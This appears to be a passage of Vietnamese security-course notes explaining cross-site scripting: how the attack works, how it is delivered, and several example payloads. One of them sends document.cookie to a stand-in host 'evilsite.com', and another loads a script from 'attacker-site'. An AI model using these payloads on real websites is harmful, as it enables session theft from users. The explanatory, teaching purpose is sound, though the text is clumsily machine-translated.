V. Các ứng dụng bảo mật
1.12. Kiểm tra vô hiệu các tham số 1 Cross Site Scripting
1.12.1. Cross Site Scripting
Cross Site Scripting là khả năng của kẻ tấn công gây ra một máy chủ web để gửi một trang vào một trình duyệt của nạn nhân có chứa kịch bản độc hại và /hoặ HTML của lựa chọn của kẻ tấn công. Các kịch bản độc hại chạy với những đặc quyền của kịch bản có nguồn gốc từ các máy chủ web hợp pháp.
Cross-site scripting(hay còn gọi là XSS và CSS) xảy ra khi một ứng dụng web tập hợp các dữ liệu độc hại từ một người sử dụng. Dữ liệu thường được thu thập trong các hình thức của một siêu liên kết trong đó có nội dung độc hại bên trong nó. Người sử dụng có thể nhấp vào liên kết này từ một trang web khác, hội đồng quản trị web, thư điện tử, hoặc từ một tin nhắn tức thời. Làm thế nào để làm việc với cross-site scripting ?
1) Các nạn nhân đăng nhập vào các trang web mục tiêu
2) Các nạn nhân sau đó nhấp chuột vào địa chỉ URL hoặc thăm một trang web mà bao gồm các mã độc hại
3) Người sử dụng trình duyệt truyền mã độc hại tới kịch bản dễ bị tổn thương trên mục tiêu như là một yêu cầu web.
4) Các trang web mục tiêu phản ảnh các mã độc hại để trình duyệt của người sử dụng nạn nhân trong đáp ứng các yêu cầu được gửi bởi nạn nhân.
5) Mã độc hại thực hiện trong trình duyệt của nạn nhân người sử dụng trong bối cảnh an toàn mục tiêu trang web.
Cách cross-site scripting làm việc
Để khởi động một cuộc tấn công XSS, kịch bản của kẻ tấn công phải được gửi cho nạn nhân. Ba cách để gửi kịch bản của một kẻ tấn công nạn nhân:
+ Người sử dụng thông tin liên lạc trong các trang web mục tiêu + URL được cung cấp trên trang web của bên thứ ba
Ví dụ/ kết quả
Ví dụ của một liên kết HTML mà người sử dụng gửi dữ liệu độc hại đến trang web khác:
<A HREF="http://CSS-Vulnerable.com /display.asp? Name = <SCRIPT> alert (document.cookie) </SCRIPT> Click here </A>
[Malicious Script is appended in the URL.]
<A HREF="http://CSS-vulnerable.com /display.asp? Name = <SCRIPT SRC= 'http://attacker-site / my_bad_script_file’ > </SCRIPT>"> Click here </A> The script could be :
<script> document.location=http://www.xxx.com </script>
OR
<iframe src=http://someothersite.com> </iframe>
<script> document.write(“<img src=‘http://evilsite.com/cookie.asp? cookie=‘+document.cookie+’width=1 height=1>”)</script>
Mã độc có thể được gửi trong thư điện tử Hello message board. This is a message
<SCRIPT>malicious code</SCRIPT> This is the end of my message.